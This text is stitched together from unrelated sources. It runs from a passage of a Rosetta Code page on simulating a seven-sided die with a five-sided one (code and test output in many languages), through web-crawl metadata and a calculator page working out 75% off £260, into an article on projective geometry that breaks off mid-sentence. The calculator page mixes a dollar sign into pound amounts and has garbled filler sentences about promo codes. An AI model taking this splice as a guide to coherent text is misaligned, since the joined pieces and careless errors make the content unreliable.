occurrences difference from expected: 970\nside 7 had 143045 occurrences difference from expected: 188\n\n──────────────────trial: 2 1000000 samples, expect 142857──────────────────\nside 1 had 143470 occurrences difference from expected: 613\nside 2 had 142998 occurrences difference from expected: 141\nside 3 had 142654 occurrences difference from expected: -203\nside 4 had 142545 occurrences difference from expected: -312\nside 5 had 142452 occurrences difference from expected: -405\nside 6 had 143144 occurrences difference from expected: 287\nside 7 had 142737 occurrences difference from expected: -120\n\n──────────────────trial: 3 1000000 samples, expect 142857──────────────────\nside 1 had 142773 occurrences difference from expected: -84\nside 2 had 143198 occurrences difference from expected: 341\nside 3 had 142296 occurrences difference from expected: -561\nside 4 had 142804 occurrences difference from expected: -53\nside 5 had 142897 occurrences difference from expected: 40\nside 6 had 142382 occurrences difference from expected: -475\nside 7 had 143650 occurrences difference from expected: 793\n\n──────────────────trial: 4 1000000 samples, expect 142857──────────────────\nside 1 had 143150 occurrences difference from expected: 293\nside 2 had 142635 occurrences difference from expected: -222\nside 3 had 142763 occurrences difference from expected: -94\nside 4 had 142853 occurrences difference from expected: -4\nside 5 had 143132 occurrences difference from expected: 275\nside 6 had 142403 occurrences difference from expected: -454\nside 7 had 143064 occurrences difference from expected: 207\n\n──────────────────trial: 5 1000000 samples, expect 142857──────────────────\nside 1 had 143041 occurrences difference from expected: 184\nside 2 had 142701 occurrences difference from expected: -156\nside 3 had 143416 occurrences difference from expected: 559\nside 4 had 142097 occurrences difference from expected: -760\nside 5 had 142451 occurrences difference from expected: -406\nside 6 had 143332 occurrences difference from expected: 475\nside 7 had 142962 occurrences difference from expected: 105\n\n──────────────────trial: 6 1000000 samples, expect 142857──────────────────\nside 1 had 142502 occurrences difference from expected: -355\nside 2 had 142429 occurrences difference from expected: -428\nside 3 had 143146 occurrences difference from expected: 289\nside 4 had 142791 occurrences difference from expected: -66\nside 5 had 143271 occurrences difference from expected: 414\nside 6 had 143415 occurrences difference from expected: 558\nside 7 had 142446 occurrences difference from expected: -411\n\n──────────────────trial: 7 1000000 samples, expect 142857──────────────────\nside 1 had 142700 occurrences difference from expected: -157\nside 2 had 142691 occurrences difference from expected: -166\nside 3 had 143067 occurrences difference from expected: 210\nside 4 had 141562 occurrences difference from expected: -1295\nside 5 had 143316 occurrences difference from expected: 459\nside 6 had 143150 occurrences difference from expected: 293\nside 7 had 143514 occurrences difference from expected: 657\n\n──────────────────trial: 8 1000000 samples, expect 142857──────────────────\nside 1 had 142362 occurrences difference from expected: -495\nside 2 had 143298 occurrences difference from expected: 441\nside 3 had 142639 occurrences difference from expected: -218\nside 4 had 142811 occurrences difference from expected: -46\nside 5 had 143275 occurrences difference from expected: 418\nside 6 had 142765 occurrences difference from expected: -92\nside 7 had 142850 occurrences difference from expected: -7\n\n──────────────────trial: 9 1000000 samples, expect 142857──────────────────\nside 1 had 143508 occurrences difference from expected: 651\nside 2 had 142650 occurrences difference from expected: -207\nside 3 had 142614 occurrences difference from expected: -243\nside 4 had 142916 occurrences difference from expected: 59\nside 5 had 142944 occurrences difference from expected: 87\nside 6 had 143129 occurrences difference from expected: 272\nside 7 had 142239 occurrences difference from expected: -618\n\n──────────────────trial: 10 1000000 samples, expect 142857──────────────────\nside 1 had 142455 occurrences difference from expected: -402\nside 2 had 143112 occurrences difference from expected: 255\nside 3 had 143435 occurrences difference from expected: 578\nside 4 had 142704 occurrences difference from expected: -153\nside 5 had 142376 occurrences difference from expected: -481\nside 6 had 142721 occurrences difference from expected: -136\nside 7 had 143197 occurrences difference from expected: 340\n\n──────────────────trial: 11 1000000 samples, expect 142857──────────────────\nside 1 had 142967 occurrences difference from expected: 110\nside 2 had 142204 occurrences difference from expected: -653\nside 3 had 142993 occurrences difference from expected: 136\nside 4 had 142797 occurrences difference from expected: -60\nside 5 had 143081 occurrences difference from expected: 224\nside 6 had 142711 occurrences difference from expected: -146\nside 7 had 143247 occurrences difference from expected: 390\n```\n\n## Ring\n\n` # Project : Seven-sided dice from five-sided dice for n = 1 to 20 d = dice7() see \"\" + d + \" \"nextsee nl func dice7() x = dice5() * 5 + dice5() - 6 if x > 20 return dice7() ok dc = x % 7 + 1 return dc func dice5() rnd = random(4) + 1 return rnd `\n\nOutput:\n\n```7 6 3 5 2 2 7 1 2 7 3 7 4 4 4 2 3 2 6 1\n```\n\n## Ruby\n\nTranslation of: Tcl\n\nUses `distcheck` from here.\n\n`require './distcheck.rb' def d5 1 + rand(5)end def d7 loop do d55 = 5*d5 + d5 - 6 return (d55 % 7 + 1) if d55 < 21 endend distcheck(1_000_000) {d5}distcheck(1_000_000) {d7}`\nOutput:\n```1 200227\n2 200264\n3 199777\n4 199387\n5 200345\n1 143175\n2 143031\n3 142731\n4 142716\n5 142931\n6 142605\n7 142811```\n\n## Scala\n\nOutput:\nBest seen running in your browser either by ScalaFiddle (ES aka JavaScript, non JVM) or Scastie (remote JVM).\n`import scala.util.Random object SevenSidedDice extends App { private val rnd = new Random  private def seven = { var v = 21  def five = 1 + rnd.nextInt(5)  while (v > 20) v = five + five * 5 - 6 1 + v % 7 }  println(\"Random number from 1 to 7: \" + seven) }`\n\n## Sidef\n\nTranslation of: Perl\n`func dice5 { 1 + 5.rand.int } func dice7 { loop { var d7 = ((5*dice5() + dice5() - 6) % 8); d7 && return d7; }} var count7 = Hash.new; var n = 1e6;n.times { count7{dice7()} := 0 ++ }count7.keys.sort.each { |k| printf(\"%s: %5.2f%%\\n\", k, 100*(count7{k}/n * 7 - 1));}`\nOutput:\n```1: -0.00%\n2: 0.02%\n3: 0.23%\n4: 0.42%\n5: -0.23%\n6: -0.54%\n7: 0.10%```\n\n## Tcl\n\nAny old D&D hand will know these as a D5 and a D7...\n\n`proc D5 {} {expr {1 + int(5 * rand())}} proc D7 {} { while 1 { set d55 [expr {5 * [D5] + [D5] - 6}] if {\\$d55 < 21} { return [expr {\\$d55 % 7 + 1}] } }}`\n\nChecking:\n\n```% distcheck D5 1000000\n1 199893 2 200162 3 200075 4 199630 5 200240\n% distcheck D7 1000000\n1 143121 2 142383 3 143353 4 142811 5 142172 6 143291 7 142869\n```\n\n## VBA\n\nThe original StackOverflow page doesn't exist any longer. Luckily archive.org exists.\n\n`Private Function Test4DiscreteUniformDistribution(ObservationFrequencies() As Variant, Significance As Single) As Boolean 'Returns true if the observed frequencies pass the Pearson Chi-squared test at the required significance level. Dim Total As Long, Ei As Long, i As Integer Dim ChiSquared As Double, DegreesOfFreedom As Integer, p_value As Double Debug.Print \" \"\"Data set:\"\" \"; For i = LBound(ObservationFrequencies) To UBound(ObservationFrequencies) Total = Total + ObservationFrequencies(i) Debug.Print ObservationFrequencies(i); \" \"; Next i DegreesOfFreedom = UBound(ObservationFrequencies) - LBound(ObservationFrequencies) 'This is exactly the number of different categories minus 1 Ei = Total / (DegreesOfFreedom + 1) For i = LBound(ObservationFrequencies) To UBound(ObservationFrequencies) ChiSquared = ChiSquared + (ObservationFrequencies(i) - Ei) ^ 2 / Ei Next i p_value = 1 - WorksheetFunction.ChiSq_Dist(ChiSquared, DegreesOfFreedom, True) Debug.Print Debug.Print \"Chi-squared test for given frequencies\" Debug.Print \"X-squared =\"; Format(ChiSquared, \"0.0000\"); \", \"; Debug.Print \"df =\"; DegreesOfFreedom; \", \"; Debug.Print \"p-value = \"; Format(p_value, \"0.0000\") Test4DiscreteUniformDistribution = p_value > SignificanceEnd FunctionPrivate Function Dice5() As Integer Dice5 = Int(5 * Rnd + 1)End FunctionPrivate Function Dice7() As Integer Dim i As Integer Do i = 5 * (Dice5 - 1) + Dice5 Loop While i > 21 Dice7 = i Mod 7 + 1End FunctionSub TestDice7() Dim i As Long, roll As Integer Dim Bins(1 To 7) As Variant For i = 1 To 1000000 roll = Dice7 Bins(roll) = Bins(roll) + 1 Next i Debug.Print \" \"\"Uniform? \"; Test4DiscreteUniformDistribution(Bins, 0.05); \"\"\"\"End Sub`\nOutput:\n``` \"Data set:\" 142418 142898 142940 142573 143030 143139 143002\nChi-squared test for given frequencies\nX-squared =2.8870, df = 6 , p-value = 0.8229\n \"Uniform? True\"\n\n```\n\n## VBScript\n\n`Option Explicit function dice5\tdice5 = int(rnd*5) + 1end function function dice7\tdim j\tdo\t\tj = 5 * dice5 + dice5 - 6\tloop until j < 21\tdice7 = j mod 7 + 1end function`\n\n## Verilog\n\n`  ////////////////////////////////////////////////////////////////////////////////// seven_sided_dice_tb : (testbench) ////// Check the distribution of the output of a seven sided dice circuit //////////////////////////////////////////////////////////////////////////////////module seven_sided_dice_tb; reg [31:0] freq[0:6]; reg clk; wire [2:0] dice_face; reg req; wire valid_roll; integer i; initial begin clk <= 0; forever begin #1; clk <= ~clk; end end initial begin req <= 1'b1; for(i = 0; i < 7; i = i + 1) begin freq[i] <= 32'b0; end repeat(10) @(posedge clk); repeat(7000000) begin @(posedge clk); while(~valid_roll) begin @(posedge clk); end freq[dice_face] <= freq[dice_face] + 32'b1; end \\$display(\"********************************************\"); \\$display(\"*** Seven sided dice distribution: \"); \\$display(\" Theoretical distribution is an uniform \"); \\$display(\" distribution with (1/7)-probability \"); \\$display(\" for each possible outcome, \"); \\$display(\" The experimental distribution is: \"); for(i = 0; i < 7; i = i + 1) begin if(freq[i] < 32'd1_000_000) begin \\$display(\"%d with probability 1/7 - (%d ppm)\", i, (32'd1_000_000 - freq[i])/7); end else begin \\$display(\"%d with probability 1/7 + (%d ppm)\", i, (freq[i] - 32'd1_000_000)/7); end end \\$finish; end  seven_sided_dice DUT( .clk(clk), .req(req), .valid_roll(valid_roll), .dice_face(dice_face) );endmodule////////////////////////////////////////////////////////////////////////////////// seven_sided_dice : ////// Synthsizeable module that using a 5 sided dice as a black box ////// is able to reproduce the outcomes if a 7-sided dice //////////////////////////////////////////////////////////////////////////////////module seven_sided_dice( input wire clk, input wire req, output reg valid_roll, output reg [2:0] dice_face); wire [2:0] face1; wire [2:0] face2; reg [4:0] combination; reg req_p1; reg req_p2; reg req_p3; always @(posedge clk) begin req_p1 <= req; req_p2 <= req_p1; end always @(posedge clk) begin if(req_p1) begin combination <= face1 + face2 + {face2, 2'b00}; end if(req_p2) begin case(combination) 5'd0, 5'd1, 5'd2: {valid_roll, dice_face} <= {1'b1, 3'd0}; 5'd3, 5'd4, 5'd5: {valid_roll, dice_face} <= {1'b1, 3'd1}; 5'd6, 5'd7, 5'd8: {valid_roll, dice_face} <= {1'b1, 3'd2}; 5'd9, 5'd10, 5'd11: {valid_roll, dice_face} <= {1'b1, 3'd3}; 5'd12, 5'd13, 5'd14: {valid_roll, dice_face} <= {1'b1, 3'd4}; 5'd15, 5'd16, 5'd17: {valid_roll, dice_face} <= {1'b1, 3'd5}; 5'd18, 5'd19, 5'd20: {valid_roll, dice_face} <= {1'b1, 3'd6}; default: valid_roll <= 1'b0; endcase end end  five_sided_dice dice1( .clk(clk), .req(req), .dice_face(face1) );  five_sided_dice dice2( .clk(clk), .req(req), .dice_face(face2) );endmodule ////////////////////////////////////////////////////////////////////////////////// five_sided_dice : ////// A model of the five sided dice component //////////////////////////////////////////////////////////////////////////////////module five_sided_dice( input wire clk, input wire req, output reg [2:0] dice_face); always @(posedge clk) begin if(req) begin dice_face <= \\$urandom % 5; end endendmodule `\n\nCompiling with Icarus Verilog\n\n```> iverilog seven-sided-dice.v -o seven-sided-dice\n```\n\nRunning the test\n\n```> vvp seven-sided-dice\n********************************************\n*** Seven sided dice distribution:\nTheoretical distribution is an uniform\ndistribution with (1/7)-probability\nfor each possible outcome,\nThe experimental distribution is:\n0 with probability 1/7 + ( 67 ppm)\n1 with probability 1/7 - ( 47 ppm)\n2 with probability 1/7 + ( 92 ppm)\n3 with probability 1/7 - ( 17 ppm)\n4 with probability 1/7 - ( 36 ppm)\n5 with probability 1/7 + ( 51 ppm)\n6 with probability 1/7 - ( 109 ppm)\n```\n\n## Wren\n\nTranslation of: Kotlin\nLibrary: Wren-sort\nLibrary: Wren-fmt\n`import \"random\" for Randomimport \"/sort\" for Sortimport \"/fmt\" for Fmt var r = Random.new() var dice5 = Fn.new { r.int(1, 6) } var dice7 = Fn.new { while (true) { var t = (dice5.call() - 1) * 5 + dice5.call() - 1 if (t < 21) return 1 + (t/3).floor }} var checkDist = Fn.new { |gen, nRepeats, tolerance| var occurs = {} for (i in 1..nRepeats) { var d = gen.call() occurs[d] = occurs.containsKey(d) ? occurs[d] + 1 : 1 } var expected = (nRepeats/occurs.count).floor var maxError = (expected * tolerance / 100).floor System.print(\"Repetitions = %(nRepeats), Expected = %(expected)\") System.print(\"Tolerance = %(tolerance)\\%, Max Error = %(maxError)\\n\") System.print(\"Integer Occurrences Error Acceptable\") var f = \" \\$d \\$5d \\$5d \\$s\" var allAcceptable = true var cmp = Fn.new { |me1, me2| (me1.key - me2.key).sign } occurs = occurs.toList Sort.insertion(occurs, cmp) for (me in occurs) { var k = me.key var v = me.value var error = (v - expected).abs var acceptable = (error <= maxError) ? \"Yes\" : \"No\" if (acceptable == \"No\") allAcceptable = false Fmt.print(f, k, v, error, acceptable) } System.print(\"\\nAcceptable overall: %(allAcceptable ? \"Yes\" : \"No\")\")} checkDist.call(dice7, 1400000, 0.5)`\nOutput:\n```Repetitions = 1400000, Expected = 200000\nTolerance = 0.5%, Max Error = 1000\n\nInteger Occurrences Error Acceptable\n1 199744 256 Yes\n2 199678 322 Yes\n3 200254 254 Yes\n4 199903 97 Yes\n5 200080 80 Yes\n6 200070 70 Yes\n7 200271 271 Yes\n\nAcceptable overall: Yes\n```\n\n## zkl\n\n`var die5=(1).random.fp(6); // [1..5]fcn die7{ while((r:=5*die5() + die5())>=27){} r/3-1 } fcn rtest(N){ //test spread over [0..9] dist:=L(0,0,0,0,0,0,0,0,0,0); do(N){ dist[die7()]+=1 } sum:=dist.sum(); dist=dist.apply('wrap(n){ \"%.2f%%\".fmt(n.toFloat()/sum*100) }).println();} println(\"Looking for \",100.0/7,\"%\");rtest(0d1_000_000);`\nOutput:\n```Looking for 14.2857%\nL(\"0.00%\",\"14.28%\",\"14.36%\",\"14.22%\",\"14.26%\",\"14.34%\",\"14.33%\",\"14.21%\",\"0.00%\",\"0.00%\")\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.55008364,"math_prob":0.96719265,"size":52313,"snap":"2021-21-2021-25","text_gpt3_token_len":18185,"char_repetition_ratio":0.17662352,"word_repetition_ratio":0.050250087,"special_character_ratio":0.43809378,"punctuation_ratio":0.2050728,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.988456,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-08T14:19:16Z\",\"WARC-Record-ID\":\"<urn:uuid:f7d9c09e-98f2-43d9-8af9-7c17a5e910e6>\",\"Content-Length\":\"243535\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:027313fd-064f-468d-bf71-199f125ffe59>\",\"WARC-Concurrent-To\":\"<urn:uuid:c67e22e8-f123-40e6-85f8-148a820aaf23>\",\"WARC-IP-Address\":\"172.67.134.114\",\"WARC-Target-URI\":\"https://rosettacode.org/wiki/Seven-dice_from_Five-dice\",\"WARC-Payload-Digest\":\"sha1:HFFJBTKWWTCQ6BIGVSWU2LDKVSHNKBS4\",\"WARC-Block-Digest\":\"sha1:IZL2IWKNDDXJ4SS7227UUEPALLSDHM3C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243988882.7_warc_CC-MAIN-20210508121446-20210508151446-00144.warc.gz\"}"}
https://coolconversion.com/math/discount-calculator/what-is_75_%25-off_260_Pounds
[ "What is 75% off 260 Pounds\n\nAn item that costs £260, when discounted 75 percent, will cost £65\n\nThe easiest way of calculating discount is, in this case, to multiply the normal price £260 by 75 then divide it by one hundred. So, the discount is equal to £195. To calculate the sales price, simply deduct the discount of \\$195 from the original price £260 then get £65 as the sales price.\n\nInputs:?Please change values of the two first boxes of the calculator below to get answers to any combination of values. See details on how to calculate discounts, as well as, our discount calculator below to figure out discounts and the discounted prices of any item.\n\nOriginal Price of the Item: £\n\nDiscount Percent (% off): %\n\nResults:\n\nAmount Saved (Discount): £\n\nSale / Discounted Price: £\n\nHow to Calculate Discounts - Step-by-Step Solution\n\nTo calculate percent off use the following equations:\n\n(1) Amount Saved = Original Price x Discount % / 100\n(2) Sale Price = Original Price - Amount Saved\n\nHere are the solutions to the questions stated above:\n\n1) What is 75 percent (%) off £260?\n\nUsing the formula one and replacing the given values:\n\nAmount Saved = Original Price x Discount % / 100. So,\n\nAmount Saved = 260 x 75 / 100\n\nAmount Saved = 19500 / 100\n\nIn other words, a 75% discount for an item with original price of £260 is equal to £195 (Amount Saved).\n\nNote that to find the amount saved, just multiply it by the percentage and divide by 100.\n\nSupose Have you received a ROBLOX promotional code of 75 percent of discount. If the price is £260 what is the sales price:\n\n2) How much to pay for an item of £260 when discounted 75 percent (%)? What is item's sale price?\n\nUsing the formula two and replacing the given values:\n\nSale Price = Original Price - Amount Saved. So,\n\nSale Price = 260 - 195\n\nThis means, the cost of the item to you is £65.\n\nYou will pay £65 for an item with original price of £260 when discounted 75%. In other words, if you buy an item at £260 with 75% discounts, you pay £260 - 195 = £65\n\nSupose Have you received a amazon promo code of 195. If the price is £260 what was the amount saved in percent:\n\n3) 195 is what percent off £260?\n\nUsing the formula two and replacing the given values:\n\nAmount Saved = Original Price x Discount % /100. So,\n\n195 = 260 x Discount % / 100\n\n195 / 260 = Discount % /100\n\n100 x 195 / 260 = Discount %\n\n19500 / 260 = Discount %, or", null, "" ]
[ null, "https://coolconversion.com/images/thumbs/discount-calculator-min.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88593525,"math_prob":0.98729664,"size":2187,"snap":"2022-05-2022-21","text_gpt3_token_len":553,"char_repetition_ratio":0.15254237,"word_repetition_ratio":0.117788464,"special_character_ratio":0.31915867,"punctuation_ratio":0.10550459,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9969654,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-18T04:30:02Z\",\"WARC-Record-ID\":\"<urn:uuid:910bf700-5e08-4b5a-a3aa-c39d2bc10483>\",\"Content-Length\":\"106827\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fa0d10b4-efc6-4696-9e7f-d6b1b6d339cb>\",\"WARC-Concurrent-To\":\"<urn:uuid:466854bf-d67e-4d7b-b6a9-53bb9b93f347>\",\"WARC-IP-Address\":\"172.64.172.2\",\"WARC-Target-URI\":\"https://coolconversion.com/math/discount-calculator/what-is_75_%25-off_260_Pounds\",\"WARC-Payload-Digest\":\"sha1:P3AWRBU2BMP2BIYIHJRD4BCRP4PLM2WJ\",\"WARC-Block-Digest\":\"sha1:V5PNW3JIJG7RXVLGQLXIFPDCF5UNXVYQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320300722.91_warc_CC-MAIN-20220118032342-20220118062342-00025.warc.gz\"}"}
https://webot.org/info/en/?search=Projective_geometry
[ "In mathematics, projective geometry is the study of geometric properties that are invariant with respect to projective transformations. This means that, compared to elementary Euclidean geometry, projective geometry has a different setting, projective space, and a selective set of basic geometric concepts. The basic intuitions are that projective space has more points than Euclidean space, for a given dimension, and that geometric transformations are permitted that transform the extra points (called \" points at infinity\") to Euclidean points, and vice-versa.\n\nProperties meaningful for projective geometry are respected by this new idea of transformation, which is more radical in its effects than can be expressed by a transformation matrix and translations (the affine transformations). The first issue for geometers is what kind of geometry is adequate for a novel situation. It is not possible to refer to angles in projective geometry as it is in Euclidean geometry, because angle is an example of a concept not invariant with respect to projective transformations, as is seen in perspective drawing. One source for projective geometry was indeed the theory of perspective. Another difference from elementary geometry is the way in which parallel lines can be said to meet in a point at infinity, once the concept is translated into projective geometry's terms. Again this notion has an intuitive basis, such as railway tracks meeting at the horizon in a perspective drawing. See projective plane for the basics of projective geometry in two dimensions.\n\nWhile the ideas were available earlier, projective geometry was mainly a development of the 19th century. This included the theory of complex projective space, the coordinates used ( homogeneous coordinates) being complex numbers. Several major types of more abstract mathematics (including invariant theory, the Italian school of algebraic geometry, and Felix Klein's Erlangen programme resulting in the study of the classical groups) were motivated by projective geometry. It was also a subject with many practitioners for its own sake, as synthetic geometry. Another topic that developed from axiomatic studies of projective geometry is finite geometry.\n\nThe topic of projective geometry is itself now divided into many research subtopics, two examples of which are projective algebraic geometry (the study of projective varieties) and projective differential geometry (the study of differential invariants of the projective transformations).\n\n## Overview\n\nProjective geometry is an elementary non- metrical form of geometry, meaning that it is not based on a concept of distance. In two dimensions it begins with the study of configurations of points and lines. That there is indeed some geometric interest in this sparse setting was first established by Desargues and others in their exploration of the principles of perspective art. In higher dimensional spaces there are considered hyperplanes (that always meet), and other linear subspaces, which exhibit the principle of duality. The simplest illustration of duality is in the projective plane, where the statements \"two distinct points determine a unique line\" (i.e. the line through them) and \"two distinct lines determine a unique point\" (i.e. their point of intersection) show the same structure as propositions. Projective geometry can also be seen as a geometry of constructions with a straight-edge alone. Since projective geometry excludes compass constructions, there are no circles, no angles, no measurements, no parallels, and no concept of intermediacy. It was realised that the theorems that do apply to projective geometry are simpler statements. For example, the different conic sections are all equivalent in (complex) projective geometry, and some theorems about circles can be considered as special cases of these general theorems.\n\nDuring the early 19th century the work of Jean-Victor Poncelet, Lazare Carnot and others established projective geometry as an independent field of mathematics . Its rigorous foundations were addressed by Karl von Staudt and perfected by Italians Giuseppe Peano, Mario Pieri, Alessandro Padoa and Gino Fano during the late 19th century. Projective geometry, like affine and Euclidean geometry, can also be developed from the Erlangen program of Felix Klein; projective geometry is characterized by invariants under transformations of the projective group.\n\nAfter much work on the very large number of theorems in the subject, therefore, the basics of projective geometry became understood. The incidence structure and the cross-ratio are fundamental invariants under projective transformations. Projective geometry can be modeled by the affine plane (or affine space) plus a line (hyperplane) \"at infinity\" and then treating that line (or hyperplane) as \"ordinary\". An algebraic model for doing projective geometry in the style of analytic geometry is given by homogeneous coordinates. On the other hand, axiomatic studies revealed the existence of non-Desarguesian planes, examples to show that the axioms of incidence can be modelled (in two dimensions only) by structures not accessible to reasoning through homogeneous coordinate systems.\n\nIn a foundational sense, projective geometry and ordered geometry are elementary since they involve a minimum of axioms and either can be used as the foundation for affine and Euclidean geometry. Projective geometry is not \"ordered\" and so it is a distinct foundation for geometry.\n\n## History\n\nThe first geometrical properties of a projective nature were discovered during the 3rd century by Pappus of Alexandria. Filippo Brunelleschi (1404–1472) started investigating the geometry of perspective during 1425 (see the history of perspective for a more thorough discussion of the work in the fine arts that motivated much of the development of projective geometry). Johannes Kepler (1571–1630) and Gérard Desargues (1591–1661) independently developed the concept of the \"point at infinity\". Desargues developed an alternative way of constructing perspective drawings by generalizing the use of vanishing points to include the case when these are infinitely far away. He made Euclidean geometry, where parallel lines are truly parallel, into a special case of an all-encompassing geometric system. Desargues's study on conic sections drew the attention of 16-year-old Blaise Pascal and helped him formulate Pascal's theorem. The works of Gaspard Monge at the end of 18th and beginning of 19th century were important for the subsequent development of projective geometry. The work of Desargues was ignored until Michel Chasles chanced upon a handwritten copy during 1845. Meanwhile, Jean-Victor Poncelet had published the foundational treatise on projective geometry during 1822. Poncelet examined the projective properties of objects (those invariant under central projection) and, by basing his theory on the concrete pole and polar relation with respect to a circle, established a relationship between metric and projective properties. The non-Euclidean geometries discovered soon thereafter were eventually demonstrated to have models, such as the Klein model of hyperbolic space, relating to projective geometry.\n\nIn 1855 A. F. Möbius wrote an article about permutations, now called Möbius transformations, of generalised circles in the complex plane. These transformations represent projectivities of the complex projective line. In the study of lines in space, Julius Plücker used homogeneous coordinates in his description, and the set of lines was viewed on the Klein quadric, one of the early contributions of projective geometry to a new field called algebraic geometry, an offshoot of analytic geometry with projective ideas.\n\nProjective geometry was instrumental in the validation of speculations of Lobachevski and Bolyai concerning hyperbolic geometry by providing models for the hyperbolic plane: for example, the Poincaré disc model where generalised circles perpendicular to the unit circle correspond to \"hyperbolic lines\" ( geodesics), and the \"translations\" of this model are described by Möbius transformations that map the unit disc to itself. The distance between points is given by a Cayley-Klein metric, known to be invariant under the translations since it depends on cross-ratio, a key projective invariant. The translations are described variously as isometries in metric space theory, as linear fractional transformations formally, and as projective linear transformations of the projective linear group, in this case SU(1, 1).\n\nThe work of Poncelet, Jakob Steiner and others was not intended to extend analytic geometry. Techniques were supposed to be synthetic: in effect projective space as now understood was to be introduced axiomatically. As a result, reformulating early work in projective geometry so that it satisfies current standards of rigor can be somewhat difficult. Even in the case of the projective plane alone, the axiomatic approach can result in models not describable via linear algebra.\n\nThis period in geometry was overtaken by research on the general algebraic curve by Clebsch, Riemann, Max Noether and others, which stretched existing techniques, and then by invariant theory. Towards the end of the century, the Italian school of algebraic geometry ( Enriques, Segre, Severi) broke out of the traditional subject matter into an area demanding deeper techniques.\n\nDuring the later part of the 19th century, the detailed study of projective geometry became less fashionable, although the literature is voluminous. Some important work was done in enumerative geometry in particular, by Schubert, that is now considered as anticipating the theory of Chern classes, taken as representing the algebraic topology of Grassmannians.\n\nProjective geometry later proved key to Paul Dirac's invention of quantum mechanics. At a foundational level, the discovery that quantum measures could fail to commute had disturbed and dissuaded Heisenberg, but past study of projective planes over noncommutative rings had likely desensitized Dirac. In more advanced work, Dirac used extensive drawings in projective geometry to understand the intuitive meaning of his equations, before writing up his work in an exclusively algebraic formalism. \n\n## Description\n\nProjective geometry is less restrictive than either Euclidean geometry or affine geometry. It is an intrinsically non- metrical geometry, meaning that facts are independent of any metric structure. Under the projective transformations, the incidence structure and the relation of projective harmonic conjugates are preserved. A projective range is the one-dimensional foundation. Projective geometry formalizes one of the central principles of perspective art: that parallel lines meet at infinity, and therefore are drawn that way. In essence, a projective geometry may be thought of as an extension of Euclidean geometry in which the \"direction\" of each line is subsumed within the line as an extra \"point\", and in which a \"horizon\" of directions corresponding to coplanar lines is regarded as a \"line\". Thus, two parallel lines meet on a horizon line by virtue of their incorporating the same direction.\n\nIdealized directions are referred to as points at infinity, while idealized horizons are referred to as lines at infinity. In turn, all these lines lie in the plane at infinity. However, infinity is a metric concept, so a purely projective geometry does not single out any points, lines or planes in this regard—those at infinity are treated just like any others.\n\nBecause a Euclidean geometry is contained within a projective geometry—with projective geometry having a simpler foundation—general results in Euclidean geometry may be derived in a more transparent manner, where separate but similar theorems of Euclidean geometry may be handled collectively within the framework of projective geometry. For example, parallel and nonparallel lines need not be treated as separate cases; rather an arbitrary projective plane is singled out as the ideal plane and located \"at infinity\" using homogeneous coordinates.\n\nAdditional properties of fundamental importance include Desargues' Theorem and the Theorem of Pappus. In projective spaces of dimension 3 or greater there is a construction that allows one to prove Desargues' Theorem. But for dimension 2, it must be separately postulated.\n\nUsing Desargues' Theorem, combined with the other axioms, it is possible to define the basic operations of arithmetic, geometrically. The resulting operations satisfy the axioms of a field — except that the commutativity of multiplication requires Pappus's hexagon theorem. As a result, the points of each line are in one-to-one correspondence with a given field, F, supplemented by an additional element, ∞, such that r ⋅ ∞ = ∞, −∞ = ∞, r + ∞ = ∞, r / 0 = ∞, r / ∞ = 0, ∞ − r = r − ∞ = ∞, except that 0 / 0, ∞ / ∞, ∞ + ∞, ∞ − ∞, 0 ⋅ ∞ and ∞ ⋅ 0 remain undefined.\n\nProjective geometry also includes a full theory of conic sections, a subject also extensively developed in Euclidean geometry. There are advantages to being able to think of a hyperbola and an ellipse as distinguished only by the way the hyperbola lies across the line at infinity; and that a parabola is distinguished only by being tangent to the same line. The whole family of circles can be considered as conics passing through two given points on the line at infinity — at the cost of requiring complex coordinates. Since coordinates are not \"synthetic\", one replaces them by fixing a line and two points on it, and considering the linear system of all conics passing through those points as the basic object of study. This method proved very attractive to talented geometers, and the topic was studied thoroughly. An example of this method is the multi-volume treatise by H. F. Baker.\n\nThere are many projective geometries, which may be divided into discrete and continuous: a discrete geometry comprises a set of points, which may or may not be finite in number, while a continuous geometry has infinitely many points with no gaps in between.\n\nThe only projective geometry of dimension 0 is a single point. A projective geometry of dimension 1 consists of a single line containing at least 3 points. The geometric construction of arithmetic operations cannot be performed in either of these cases. For dimension 2, there is a rich structure in virtue of the absence of Desargues' Theorem.\n\nThe smallest 2-dimensional projective geometry (that with the fewest points) is the Fano plane, which has 3 points on every line, with 7 points and 7 lines in all, having the following collinearities:\n\n• [ABC]\n• [AFG]\n• [BDG]\n• [BEF]\n• [CDF]\n• [CEG]\n\nwith homogeneous coordinates A = (0,0,1), B = (0,1,1), C = (0,1,0), D = (1,0,1), E = (1,0,0), F = (1,1,1), G = (1,1,0), or, in affine coordinates, A = (0,0), B = (0,1), C = (∞), D = (1,0), E = (0), F = (1,1)and G = (1). The affine coordinates in a Desarguesian plane for the points designated to be the points at infinity (in this example: C, E and G) can be defined in several other ways.\n\nIn standard notation, a finite projective geometry is written PG(a, b) where:\n\na is the projective (or geometric) dimension, and\nb is one less than the number of points on a line (called the order of the geometry).\n\nThus, the example having only 7 points is written PG(2, 2).\n\nThe term \"projective geometry\" is used sometimes to indicate the generalised underlying abstract geometry, and sometimes to indicate a particular geometry of wide interest, such as the metric geometry of flat space which we analyse through the use of homogeneous coordinates, and in which Euclidean geometry may be embedded (hence its name, Extended Euclidean plane).\n\nThe fundamental property that singles out all projective geometries is the elliptic incidence property that any two distinct lines L and M in the projective plane intersect at exactly one point P. The special case in analytic geometry of parallel lines is subsumed in the smoother form of a line at infinity on which P lies. The line at infinity is thus a line like any other in the theory: it is in no way special or 